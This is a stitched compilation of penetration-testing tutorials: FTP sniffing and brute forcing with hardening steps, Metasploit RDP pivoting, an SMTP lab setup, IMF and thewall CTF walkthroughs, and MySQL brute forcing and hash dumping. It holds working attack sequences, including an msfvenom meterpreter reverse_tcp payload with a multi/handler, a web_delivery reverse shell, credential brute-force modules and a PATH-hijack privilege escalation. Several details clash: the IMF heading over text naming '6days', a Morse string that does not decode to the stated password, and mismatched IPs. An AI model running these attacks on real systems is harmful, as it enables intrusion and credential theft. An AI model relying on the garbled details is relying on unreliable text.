Similarly we captured the TCP packets with Wireshark to sniff FTP credentials; from the given image you can observe that user: raj with password: 123 has logged in successfully.


Use SSL Certificate to prevent Credential stealing
SSL stands for Secure Sockets Layer, the protocol which provides secure, encrypted communication between server and client; it encrypts the data packets travelling between server and client over the network.

Although an attacker can still sniff the network packets, he will not be able to read the captured information because all the data will appear as cipher text.

Here the administrator needs to generate an SSL certificate for secure authentication. Make the directory where the SSL certificate and key will be stored.

mkdir /etc/ssl/certificates


Type the following command, which generates a self-signed SSL certificate with a 2048-bit RSA key, valid for 365 days, inside the certificates directory.
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/certificates/vsftpd.pem -out /etc/ssl/certificates/vsftpd.pem
To generate the new private key and certificate it asks for information such as country name, state, email address etc., as shown in the image given below.


Now we need to open the vsftpd.conf file and change the default settings by adding the following lines at the end of the file.
rsa_cert_file=/etc/ssl/certificates/vsftpd.pem
rsa_private_key_file=/etc/ssl/certificates/vsftpd.pem
ssl_enable=YES
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
require_ssl_reuse=NO
ssl_ciphers=HIGH

You can confirm it as shown in the given image; now save the changes and restart the service.
service vsftpd restart


Establish TLS/SSL connection with FTP through WinSCP
Now let's check whether we can connect to the FTP server over TLS/SSL or not.
File protocol: FTP
Encryption: TLS/SSL Explicit encryption
Host name: IP of the FTP server
Port: 21
Username and Password: raj: 123
Click on Login


Now the server will send its certificate to the authorized user; click on Yes to store the certificate and continue the encrypted connection.


If an attacker sniffs the network packets he will only get cipher text, as shown in the given image. In this way we can prevent sniffing from stealing credentials in any network.


FTP Brute force Attack
Another way to steal credentials is a brute force attack on the FTP server using Metasploit.
Open the terminal in your Kali Linux, load the Metasploit framework and type the following commands to brute force the FTP login.
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set rhosts 192.168.1.128
msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > exploit
From the given image you can observe that our FTP server is not secure against brute force attacks, because it shows the matching combination of username: raj and password: 123 for login.

Once an attacker steals your username and password, he tries to log in to the server as an authorized user and can then perform mischievous actions such as stealing your important data or replacing it with malicious files.
Bravo!! You can observe that using raj: 123 we have logged in successfully.
Hence our server is not secure against this kind of attack, so let's protect our FTP server.

Here the admin can set iptables chain rules for a certain number of connection attempts; if a client exceeds the defined number, its further attempts are dropped for the time period specified by the admin.
Type the commands given below to set the iptables chain rules for the lockout policy:
iptables -I INPUT -p tcp --dport 21 -i eth0 -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 21 -i eth0 -m state --state NEW -m recent --update --seconds 120 --hitcount 3 -j DROP

Now the above rules will allow only 3 new connections to the FTP server from one IP within 120 seconds (2 minutes); further connections from that IP are dropped while the window lasts.

service vsftpd restart


Let's ensure the iptables chain rules are working by making a brute force attack as above.
Great!! It has prevented the brute force by stopping it after 3 attempts, but the block is lifted after 2 minutes; therefore the admin should block for a longer period of time.


The admin can use vsftpd.log to view the client IPs that try to connect to the vsftpd server (vsftpd writes it to /var/log/vsftpd.log by default).
tail /var/log/vsftpd.log


Now open the hosts.allow file inside /etc to allow a valid user to connect to the server securely from a specific IP.
At the end of the text file enter the specific IP to which you want to give permission to establish a connection, as shown in the given image.

vsftpd: 192.168.0.104


It is quite important that the admin restricts all IPs other than the allowed IP (192.168.0.106) to protect the network from connections from unknown IPs.
Open /etc/hosts.deny and specify the list of hosts which you do not want to allow to access the system.
vsftpd: ALL


Now open the vsftpd configuration file and add the following lines:
# TCP Wrappers
tcp_wrappers=YES

Restart the service with “service vsftpd restart”


When a valid user tries to connect from another IP, the server will not allow the connection to be established, as shown in the given image.


FTP Port forwarding
As we know port 21 is the default port for the FTP service, so we can also move the service from port 21 to another port.

Open the vsftpd.conf file and follow the steps given below:

·         Disable connections from port 20: connect_from_port_20=NO
·         Add listen_port=5000
·         service vsftpd restart




Great!!! We have successfully connected to the FTP server via port 5000. In this way internal penetration testing helps us with system and network security.

Note: Always restart the vsftpd service after making any changes in its configuration file.

RDP Pivoting with Metasploit

In our previous tutorial we discussed SSH pivoting, and today we are going to discuss RDP pivoting.

Pivoting is a technique to get inside an otherwise unreachable network with the help of a pivot (centre point). In simple words it is an attack through which the attacker can exploit systems that belong to a different network. For this attack, the attacker needs to exploit the main server, which lets the attacker add himself to its local network; the attacker can then target the client systems.

Lab Setup requirement:
Attacker machine: Kali Linux
Pivot Machine (server): Windows operating system with two network interfaces

Target Machine (client): Windows 7 (with the RDP service allowed)


Use the MS17-010 exploit or a multi handler to compromise the pivot machine and bypass its UAC to obtain admin privileges.
sessions
Hence if you count, the attacker currently holds 2 sessions: the 1st for the meterpreter shell and the 2nd for the UAC bypass on the server.


Check the network interfaces with the following command:
meterpreter > ifconfig
From the given image you can observe two network interfaces on the victim's system: the 1st with IP 192.168.0.27, through which the attacker is connected, and the 2nd with IP 192.168.100.100, through which the clients (targets) are connected.


Since the attacker belongs to the 192.168.0.1 interface and the client belongs to the 192.168.100.0 interface, it is not possible to attack the client network directly unless the attacker acquires a connection into that network. To reach the 192.168.100.0 network the attacker needs to run the "autoroute" post-exploitation module.
This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list, then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.
msf > use post/multi/manage/autoroute
msf post(autoroute) > set session 2
msf post(autoroute) > exploit
Note: If you have not bypassed UAC you can use session 1 for the post module.


This module will perform an ARP scan for a given IP range through a Meterpreter session.

use post/windows/gather/arp_scanner
msf post(arp_scanner) > set rhosts 192.168.100.100-110
msf post(arp_scanner) > set session 2
msf post(arp_scanner) > set threads 20
msf post(arp_scanner) > exploit

Here we found a new IP, 192.168.100.103, as shown in the given image. Let's perform a TCP port scan for active services on this machine.


This module enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful when pivoting.

use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set ports 445,3389
msf auxiliary(tcp) > set rhosts 192.168.100.103
msf auxiliary(tcp) > set threads 10
msf auxiliary(tcp) > exploit
From the given image you can observe that port 3389 and port 445 are open, and we know that 3389 is used for RDP and 445 for SMB.


This module will test an SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set rhosts 192.168.100.103

msf auxiliary(smb_login) > set user_file /root/Desktop/user.txt
msf auxiliary(smb_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(smb_login) > set stop_on_success true
msf auxiliary(smb_login) > exploit

From the given image you can observe the highlighted pentest:123, which has logged in successfully.


Now type the following command to forward the port to localhost.

meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.100.103

-l: the local port to listen on.
-p: the remote port to connect to.
-r: the remote host address to connect to.


Now type the following command to connect the RDP client to localhost on port 3389:
rdesktop 127.0.0.1:3389


Now it will ask for credentials to connect to the RDP client; enter the username and password combination you retrieved with the SMB login module.
If you remember, we retrieved pentest:123 through the smb_login module, and that is what we use to log in.


Wonderful!! We have successfully exploited the RDP client.

Step by Step SMTP Lab Setup in Ubuntu

From Wikipedia
Hello friends! Today we are discussing the configuration of an SMTP mail server for sending mail in your LAN.
SMTP stands for Simple Mail Transfer Protocol; communication between mail servers uses TCP port 25. For retrieving messages, client applications usually use either IMAP or POP3.

POP3 stands for Post Office Protocol (POP) is an application-layer Internet standard protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection. It uses port 110 for receiving mail.

IMAP stands for Internet Message Access Protocol (IMAP) is also an Internet standard protocol used by e-mail clients to retrieve e-mail messages from a mail server over a TCP/IP connection. It uses port 143 for receiving mail.

Let’s start!!

Add Hostname and domain

With root privilege, open the hosts file to add the hostname and domain name with the following command:
sudo gedit /etc/hosts

Now add the line given below to the hosts file and save it.

127.0.0.1 mail.ignite.lab ignite


sudo gedit /etc/hostname

Now rewrite the default hostname as "ignite", which we also mentioned in the hosts file, as shown in the given image, and save it.


Now restart the machine after making changes in hosts file and hostname.
sudo reboot
Now check the hostname and domain by typing the following commands to confirm the changes you made.
hostname
hostname -f

Install Postfix
Postfix is the default Mail Transfer Agent (MTA) for Ubuntu. It is in Ubuntu's main repository, which means that it receives security updates. This guide explains how to install and configure Postfix and set it up as an SMTP server using a secure connection.

sudo apt-get install postfix


A dialog box will pop up for Postfix Configuration, where you have to select "Internet Site" as the general type of mail configuration, as shown in the given image.


Enter the domain name (mail.ignite.lab) that you saved in the hosts file as the system mail name and click on OK.


Postfix Configuration Setting
Open the main.cf file, make the following changes, and save it.
·         Add the subnet IP: mynetworks = 127.0.0.0/8 192.168.1.0/24
·         Set inet_protocols = ipv4
·         Add a new line: home_mailbox = Maildir/




Now type the following command to view the list of open ports listening for incoming connections.
netstat -tnl

-t: TCP sockets only
-n: numeric addresses and ports, no name resolution
-l: listening sockets only

From the given image you can observe the STATE of port 25.


Install Dovecot
Dovecot is a Mail Delivery Agent, written with security primarily in mind. It supports the major mailbox formats: mbox and Maildir. This section explains how to set it up as an IMAP or POP3 server.
sudo apt-get install dovecot-imapd dovecot-pop3d




Another pop-up will ask for the hostname that will be used in SSL certificates. Enter your domain name as shown in the given image and click on OK.


Dovecot configuration setting
Open the 10-auth.conf file at the path given below:
/etc/dovecot/conf.d/10-auth.conf

Now make the following change in it as shown in the given image, then save it.
disable_plaintext_auth = yes



auth_mechanisms = plain login


Now open 10-mail.conf, make the following change as shown in the given image, then save it.
mail_location = maildir:/home/%u/Maildir


Open the 10-master.conf file at the path given below:
/etc/dovecot/conf.d/10-master.conf
Enable port = 143


Enable port = 110


Give permission for the unix_listener auth-userdb:
mode = 0600
user = postfix
group = postfix


sudo service dovecot restart


Check the service with netstat -tnl to view the list of open ports listening for incoming connections.
From the given image you can observe STATE LISTEN for ports 110 and 143.
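The two netstat checks above (port 25 after Postfix, ports 110 and 143 after Dovecot) and the disable_plaintext_auth setting are the things worth verifying on every rebuild of this lab. The script below is an added example, not code from the article: it parses constructed `netstat -tnl` output and a constructed fragment of 10-auth.conf (the addresses and file contents are made up, but follow the real formats) and reports which mail ports are missing and whether plaintext authentication is still allowed. With disable_plaintext_auth = yes, Dovecot refuses PLAIN/LOGIN until the client has negotiated STARTTLS, so a client that connects on 143 without TLS cannot leak the password in clear text.

```python
# Constructed `netstat -tnl` output resembling the lab server once Postfix
# and Dovecot are running (not the article's own screenshot).
NETSTAT_OK = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:143             0.0.0.0:*               LISTEN
tcp6       0      0 :::25                   :::*                    LISTEN
"""

# Same host before the POP3 listener was enabled in 10-master.conf.
NETSTAT_NO_POP3 = "\n".join(l for l in NETSTAT_OK.splitlines() if ":110" not in l) + "\n"

# Constructed fragment of /etc/dovecot/conf.d/10-auth.conf.
AUTH_CONF = """\
# Disable LOGIN command and all other plaintext authentications unless
# SSL/TLS is used (LOGINDISABLED capability).
#disable_plaintext_auth = yes
disable_plaintext_auth = yes

auth_mechanisms = plain login
"""

MAIL_PORTS = {25: "SMTP (Postfix)", 110: "POP3 (Dovecot)", 143: "IMAP (Dovecot)"}


def listening_ports(netstat_text):
    """Ports in LISTEN state from `netstat -tnl` output, IPv4 and IPv6 alike."""
    ports = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[0].startswith("tcp") and fields[5] == "LISTEN":
            # Local address is host:port; rsplit handles ':::25' as well.
            ports.add(int(fields[3].rsplit(":", 1)[1]))
    return ports


def missing_mail_ports(netstat_text, expected=MAIL_PORTS):
    """Expected mail ports that are not listening, with the service name."""
    open_ports = listening_ports(netstat_text)
    return {p: name for p, name in expected.items() if p not in open_ports}


def dovecot_setting(conf_text, key):
    """Value of `key` from a Dovecot conf fragment: comments are skipped and a
    later assignment overrides an earlier one."""
    value = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        k, v = (s.strip() for s in line.split("=", 1))
        if k == key:
            value = v
    return value


def audit_mail_lab(netstat_text, auth_conf_text):
    """Findings as plain strings; an empty list means the lab is as expected."""
    findings = [f"port {p} ({name}) is not listening"
                for p, name in missing_mail_ports(netstat_text).items()]
    if dovecot_setting(auth_conf_text, "disable_plaintext_auth") != "yes":
        findings.append("disable_plaintext_auth is not 'yes': PLAIN/LOGIN "
                        "credentials may cross the network unencrypted")
    return findings


if __name__ == "__main__":
    print("complete lab:", audit_mail_lab(NETSTAT_OK, AUTH_CONF) or "ok")
    print("POP3 missing:", audit_mail_lab(NETSTAT_NO_POP3, AUTH_CONF))
```

Run it against the real output with `audit_mail_lab(open("/tmp/netstat.txt").read(), open("/etc/dovecot/conf.d/10-auth.conf").read())` after saving `netstat -tnl` to a file; the function names and sample data are this example's own.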


We already have a user, sr; let's configure a mail account for him by entering the following information in the given text fields:
·         Your name: sr
·         Email address: sr@mail.ignite.lab
·         Password: 1234 (the user's password)

Now click on Continue, then choose the manual config tab.


Enter your network IP (192.168.1.107) as the server hostname for incoming mail on port 143 and outgoing mail on port 25. Then click on Done.


A new window will come up for a security exception; click on the Confirm Security Exception button at the bottom.


For sending mail we always need two user accounts, one as sender and another as receiver. Now type the following command to add a new user.
adduser raj

Since we have already configured an account for user sr in Thunderbird, now create another mail account for user raj in Thunderbird the same way as above.

Hence we have two accounts on the mail server for sending a message:
·         Sender: raj@mail.ignite.lab
·         Receiver: sr@mail.ignite.lab


Send mail using Thunderbird
Now write an email from sr@mail.ignite.lab to raj@mail.ignite.lab to test the mail server, as shown in the given image. Click on Send after typing the message.


In this way you can configure your own mail server for a local network.

Hack the IMF VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as 6days. The credit for making this VM goes to "Geckom", and it is another CTF challenge where we have to find 6 flags to complete it. You can download this VM here.
Let's Breach!!!
Let us start from getting to know the IP of the VM (here I have it at 192.168.0.25, but you will have to find your own).

netdiscover

Use nmap for port enumeration
nmap -sV  192.168.0.25

We find that port 80 is open, so we open it in our browser.


We take a look at the source code and find a few JavaScript files that look base64 encoded.
Inside the flag we find another base64 encoded string; decoding it we get the string imfadministrator.
We take a look around the website, and in the source code of the contact.php page we find our 1st flag.

Flag 1 contains a base64 encoded string; decoding it we get the string allthefiles.
We open allthefiles and imfadministrator in the browser. We find that imfadministrator is a directory that leads to a login page.

On the contact.php page we found a few email addresses, so we use cewl to make a dictionary.
We use Burp Suite to launch a dictionary attack. We select the position and change the password from a string to an array.

Now we find the third flag in the response.
Now that we can access the page, we see that it might be vulnerable to SQL injection.

Using burpsuite we save the request in a text file.

We use sqlmap to dump the database.
sqlmap -r /root/Desktop/imf.txt --dbs --batch --dump-all


We find the name of the pages along with another page called tutorial-incomplete. We open it on our browser and find a page with QR-code inside an image.


When we decode the QR code we get our 4th flag.


Inside the flag we find a base64 encoded string; when we decode it we get the string uploadr942.php.
We open it on our browser and find a page to upload a file.

Now while uploading a shell we find that it is protected from WAF, so we create a custom shell and save it as GIF file to bypass the WAF.


Now we upload the file and check the response from the server to find where our file is uploaded.


We find that the server sends a string in a comment: our file is in the uploads folder, and the comment in the server's response is the name of our file.

After finding our shell, we find the 5th flag. Now we use web_delivery to get a reverse shell with Metasploit.


We setup our metasploit for web delivery and execute the command on our shell.


Now that we have the reverse shell, we take a look inside the 5th flag.


We find a base64 encoded string; when we decode it we get the string agentservices.
We check the connections on the server using netstat.
netstat -antp


We find a service running on port 7788, so we use curl to find out what the server is running there.
curl localhost:7788

We find a service called agent is running, so we find the location of agent with the which command.
which agent


So we knock on the server and find that port 7788 is opened.
knock 192.168.0.25 7482 8279 9467


Now we download the agent program file to our system for reverse engineering.
download agent /root/Desktop


Now we reverse engineer the file to find an exploit. First we disassemble the main function.
gdb -q agent
disassemble main



We set a breakpoint at 80486ba and run the program. Once it stops there, we look at the registers and the memory associated with the program.
break *0x80486ba
run
info registers


We look at four words of memory above the stack pointer.
x/4xw 0xffffd340


At memory address 804c070 we find the password to access the program.
x/s 0x0804c070


Now we access the program on the server using netcat and find that the string gives us access to the program.
netcat 192.168.0.25 7788


Now we create an exploit for this program; first we generate shellcode for the payload with msfvenom.
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.15 lport=4444 -f python -b '\x00\xa0\x0d'


Now we write our exploit in Python. We manually fuzz the memory location inside our exploit.


We set up our handler in Metasploit and execute the exploit.
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.15
msf exploit(handler) > set lport 4444
msf exploit(handler) > run


Now we check for sessions and take the interactive shell.
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 3


Now we take a shell and check our privileges; we find that we are root. When we move inside the /root/ folder we find our 6th and final flag.



Hack the thewall VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as thewall. The credit for making this VM goes to "Xerubus", and it is another boot2root challenge where we have to root the VM to complete it. You can download this VM here.
Let's Breach!!!
Let us start from getting to know the IP of the VM (here I have it at 192.168.0.17, but you will have to find your own).
netdiscover


We did an nmap scan but it showed nothing. So we use arp to check whether the VM is broadcasting anything.

arp -an


We find that it is broadcasting something on the network, so we use Wireshark to check on which port it is broadcasting the data.
We find that it is broadcasting on port 1337, so we use netcat to listen on port 1337.
nc -lvp 1337


We find it was broadcasting something related to Pink Floyd; we do another nmap scan to check whether that changed anything.
nmap -sV 192.168.0.17

As we can see, port 80 is now open, so we open this IP in our browser.


We take a look at the page's source code and find a hexadecimal encoded string.


When we decode it we find an md5 hash and a hint to do steganography.


We crack the md5 hash and get the string divisionbell.


We download the image from the webpage and use steghide to check whether something is hidden inside it. When we try to extract, it prompts for a password; using the string we recovered above we find that a text file is hidden inside the image and are able to extract it.
steghide info pink_floyd.jpg
steghide extract -sf pink_floyd.jpg


When we open the text file we find a base64 encoded string, an md5 hash and a hint to use them on port 1965.


First we decode the base64 encoded string and get the string SydBarret.


Then we crack the md5 hash and get the string pinkfloydrocks.


Port enumeration on 1965 shows it is running OpenSSH, so we check whether we can log in with username SydBarret and password pinkfloydrocks.


When we try to log in, it tells us that we can only connect through SFTP. So we use SydBarrett as the username and pinkfloydrocks as the password to log in through sftp.


Now that we are inside, we find a file called eclipsed_by_the_moon, which we download to our system.



We check what kind of file it is and find that it is a gzip archive, so we extract it using tar.
file eclipsed_by_the_moon
tar xvfz eclipsed_by_the_moon


After extracting, we check the extracted file and find that it is a boot sector.
file eclipsed_by_the_moon.lsd


We check whether we can recover any file from the boot sector image using testdisk.
testdisk eclipsed_by_the_moon.lsd
We select the image to recover files from.


We select "None" (non-partitioned media) as it is a boot sector.


We go to advanced to recover file from the image.


We then select the partition in which we want to extract the file from and select undelete to recover the files.


We find that an image file is recovered, we copy it.


We select the directory of our system in which we want to copy the file.


We check the image we just recovered and find a picture of Roger Waters; we also get a password inside the image.


We log in through SSH; enumerating the username we find that RogerWaters is the username and the password is hello_is_there_anybody_in_there.
After getting in, we find that there are different directories for the different Pink Floyd band members.
ls -al


We also find that we have limited access and cannot enter their directories, so we check for binaries available to other users and find that the users NickMason and DavidGilmour have binaries called brick and shineon.
find / -user DavidGilmour 2>/dev/null
find / -user NickMason 2>/dev/null


We don't have access to run the binary shineon, but when we run brick it asks us a question. When we answer it correctly we become the user NickMason.


Now we can access the NickMason/ directory. We find an image file inside and use scp to send it to our local system.
scp nick_mason_profile_pic.jpg root@192.168.0.16:/root/Desktop


We check the file type and find that it is actually an audio file, so we rename it from .jpg to .ogg.


When we listen to the audio, we find that Morse code is playing in the background along with the music. We filter the audio frequencies to isolate the Morse code.


.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .. ... .-
We find that the Morse code translates to richardwright1943farfisa. We use RichardWright as the username and 1943farfisa as the password to log in as user RichardWright.


Now we try to run the binary shineon; after running it we find that we can use a symbolic link and a changed PATH to go from DavidGilmour to RichardWright.
ln -s /bin/ksh /tmp/mail
export PATH=/tmp:$PATH
When we now run shineon we become the user DavidGilmour.


Inside DavidGilmour/folder we find a link inside the file.


When we open this link on the browser we find an image on which something is written.



When we decrease the contrast of the image, we find a hexadecimal string.


Then we also send the image file that we find inside the DavidGilmour/ folder to our system using scp.
scp david_gilmour_profile_pic.jpg root@192.168.0.16:/root/Desktop/


We then run strings on the image file and find the string who_are_you_and_who_am_i.


Now we use DavidGilmour as username and who_are_you_and_who_am_i as password.


We now are in welcometothemachine group; we move inside /var/www/htdocs/welcometothemachine/.


We find a file called PinkFloyd, we run the file and find it asks a question. We use the hexadecimal string inside the image we find on the webpage.


Now we are given the permission to get root, as DavidGilmour is added into sudoers after running this program.


Now when we enter the /root/ directory we find the flag marking the end of the VM challenge.



MySQL Penetration Testing with NMAP

In this article we are discussing MySQL penetration testing using Nmap, where you will learn how to retrieve database information such as database names, table records, usernames, passwords and so on.

MySQL is an open-source Relational Database Management System that uses Structured Query Language to manage database records.

Lets Begin !!!

Scanning for port 3306

Open the terminal and type the following command to check whether the MySQL service is active on the targeted system; by default MySQL listens on port 3306.
nmap -sT 192.168.1.216

From the given image you can observe that port 3306 is open for the MySQL service; now let's enumerate it.


Retrieve mysql information
Now type another command to retrieve MySQL information such as version, protocol and so on:

nmap --script=mysql-info 192.168.1.216


The command above connects to the MySQL server and prints information such as the protocol: 10, version number: 5.5.57-0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt, as shown in the image below.


Brute force attack
This command uses a dictionary of usernames and a dictionary of passwords and tries every combination against MySQL in a brute force attack.

nmap -p 3306 --script mysql-brute --script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From the given image you can observe that it found the valid credential root:toor. This credential allows a direct login to the MySQL server.


Retrieve MySQL user names
This command fetches the MySQL user names with the help of the arguments mysqluser=root and mysqlpass=toor.
nmap -p 3306 --script=mysql-users 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can see that we found four user names: root, debian-sys-maint, sr, st.


Retrieve database names
This command fetches the MySQL database names with the help of the arguments mysqluser=root and mysqlpass=toor.
nmap -p 3306 --script=mysql-databases 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can read the name of the created database, ignite.


This command performs the same task as above but retrieves the database names with the MySQL query "show databases":

nmap -p 3306 192.168.1.216 --script mysql-query --script-args "query=show databases,username=root,password=toor"

From the image below you can read the name of the created database, ignite.


Retrieve MySQL variable status ON/OFF
When we want to pass a value from one SQL statement to another SQL statement, we store the value in a MySQL user-defined variable.
This command fetches the MySQL variables with the help of the arguments mysqluser=root and mysqlpass=toor.

nmap -p 3306 --script=mysql-variables 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the given image you can observe the ON/OFF status of each MySQL variable.


Retrieve password hashes
This command dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.
nmap -p 3306 --script=mysql-dump-hashes 192.168.1.216 --script-args username=root,password=toor

From the given image you can observe that it has dumped the password hash of each user we enumerated above.

Penetration Testing on MYSQL (Port 3306)

Hello friends!! Today we are discussing internal penetration testing on a MySQL server. In our previous article we already discussed how to configure MySQL on Ubuntu, which you can read here; now we move on to its penetration testing.

Attacker: kali Linux
Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Lets start !!

Scanning MySQL
Scanning plays an important role in penetration testing because through scanning the attacker learns which services and open ports are available for enumeration and attack.
Here we are using nmap to scan port 3306.
nmap -sT 192.168.1.216

If the service is active on the targeted server, nmap shows STATE open for port 3306.


Enumerating the MySQL Banner
An attacker always performs enumeration to find important information such as the software version (known as banner grabbing) and then checks whether that version is vulnerable to any exploit.
Open the terminal in Kali Linux and load the Metasploit framework; now type the following commands to scan for the MySQL version.

use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set rhosts 192.168.1.216
msf auxiliary(mysql_version) > set rport 3306
msf auxiliary(mysql_version) > run

From the given image you can read the highlighted text showing that MySQL 5.5.57 is the installed version, with protocol 10, on the Ubuntu 14.04.1 operating system.


MYSQL Brute Force Attack

An attacker always tries a brute force attack to steal credentials for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.216
msf auxiliary(mysql_login) > set rport 3306
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > run

This starts the brute force attack and tries every username and password combination from the users.txt and password.txt files.



From the given image you can observe that our MySQL server is not secure against brute force attacks, because it shows the matching combination of username root and password toor for login.

Once the attacker retrieves valid credentials he can log in to the MySQL server directly to steal or destroy the database information.


Stealing MySQL information using Metasploit
This module allows simple SQL statements to be executed against a MySQL instance given the appropriate credentials.
use auxiliary/admin/mysql/mysql_sql
msf auxiliary(mysql_sql) > set rhost 192.168.1.216
msf auxiliary(mysql_sql) > set username root
msf auxiliary(mysql_sql) > set password toor
msf auxiliary(mysql_sql) > set SQL show databases;
msf auxiliary(mysql_sql) > run

From the given image you can observe that it has executed the SQL query and dumped the names of the databases.


This module extracts the schema information from a MySQL database server.

use auxiliary/scanner/mysql/mysql_schemadump
msf auxiliary(mysql_schemadump) > set rhosts 192.168.1.216
msf auxiliary(mysql_schemadump) > set username root
msf auxiliary(mysql_schemadump) > set password toor
msf auxiliary(mysql_schemadump) > run

Here it has dumped the schema for the database "ignite" with the table "student", which has 5 columns with the following column types:

DB: ignite
Table name: student

·         Last Name (varchar 30)
·         First Name (varchar 30)
·         Student ID (int 11)
·         Major (varchar 20)
·         Dorm (varchar 20)


Check file privileges
Open the my.cnf file to verify the file privilege settings using the following command:
gedit /etc/mysql/my.cnf


Here you can see that the statements given below are uncommented:
·         [mysqld_safe]
·         [mysqld]
·         secure_file_priv
If these statements are uncommented it becomes very easy for the attacker to perform file enumeration.


MySQL File Enumeration
This module enumerates files and directories using the MySQL load_file feature.

use auxiliary/scanner/mysql/mysql_file_enum
msf auxiliary(mysql_file_enum) > set rhosts 192.168.1.216
msf auxiliary(mysql_file_enum) > set username root
msf auxiliary(mysql_file_enum) > set password toor
msf auxiliary(mysql_file_enum) > set DIR_LIST /root/Desktop/file.txt
msf auxiliary(mysql_file_enum) > run

Here it starts checking whether each entry in the given file list exists on the target system.
From the given image you can observe that it has found that the directories /etc, /var and /var/www exist.



This module enumerates writable directories using the MySQL SELECT INTO DUMPFILE feature; for more information see the URL in the module's references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text "test" will be written to the directory. ***

use auxiliary/scanner/mysql/mysql_writable_dirs
msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216
msf auxiliary(mysql_writable_dirs) > set username root
msf auxiliary(mysql_writable_dirs) > set password toor
msf auxiliary(mysql_writable_dirs) > set DIR_LIST /root/Desktop/file.txt
msf auxiliary(mysql_writable_dirs) > run

Here we assigned a list of directories so that we can identify which are writable, and from the given image you can observe that it found write permission only on /tmp.


MySQL User Enumeration
This module allows simple enumeration of a MySQL Database Server, provided proper credentials to connect remotely.

use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > set rhost 192.168.1.216
msf auxiliary(mysql_enum) > set username root
msf auxiliary(mysql_enum) > set password toor
msf auxiliary(mysql_enum) > run

It starts retrieving information such as the list of other user accounts and the user privileges on the MySQL server.


From the given image it will be clear to you that it has shown the list of accounts with their password hashes and the list of users who have the GRANT privilege.
As you can see, other than root it has some more users, such as sr, with their password hashes; you can crack these hashes with a password cracking tool.


This module extracts the usernames and password hashes from a MySQL server and stores them for later cracking.
use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216
msf auxiliary(mysql_hashdump) > set username root
msf auxiliary(mysql_hashdump) > set password toor
msf auxiliary(mysql_hashdump) > exploit

Now from the screenshot you can see the password hash of every user. Metasploit stores these hashes inside the /tmp folder and later uses John the Ripper to crack the passwords.


This module uses John the Ripper to identify weak passwords from the hashes acquired by the mysql_hashdump module. Passwords that are successfully cracked are then saved as proper credentials.

use auxiliary/analyze/jtr_mysql_fast
msf auxiliary(jtr_mysql_fast) > options
msf auxiliary(jtr_mysql_fast) > run

By default it uses the Metasploit wordlist against the saved hashes and starts cracking them.


If you look at the image below you can see that it has successfully cracked the double SHA-1 hashes and recovered the passwords in plain text.


Now, using the credentials retrieved above, you can try to log in to the MySQL server.


Here you can see that we have successfully logged in to the server. Hence an attacker can easily breach the security of the server and steal or modify the important information.


Secure MySQL through port forwarding
To secure the MySQL server the admin can move the service from the default port to a specific port. Open the my.cnf file with the following command to make the change:
gedit /etc/mysql/my.cnf


Now change port 3306 to any other port, such as 3000, as shown in the given image; save the changes and restart the service.
service mysql restart


Verify it with nmap as given below:
nmap -sT 192.168.1.216


Prevent MySQL brute force attacks
To secure the MySQL server the admin can bind the service to localhost. Open the my.cnf file with the following command to make the change:
gedit /etc/mysql/my.cnf


You only need to enable bind-address by uncommenting it, as shown in the given images, and then restart the service.
service mysql restart


Now let's verify it by running the same dictionary brute force attack as above.
Great!! The attacker is not able to connect to the server, which also resists the brute force attack, as shown in the given image.


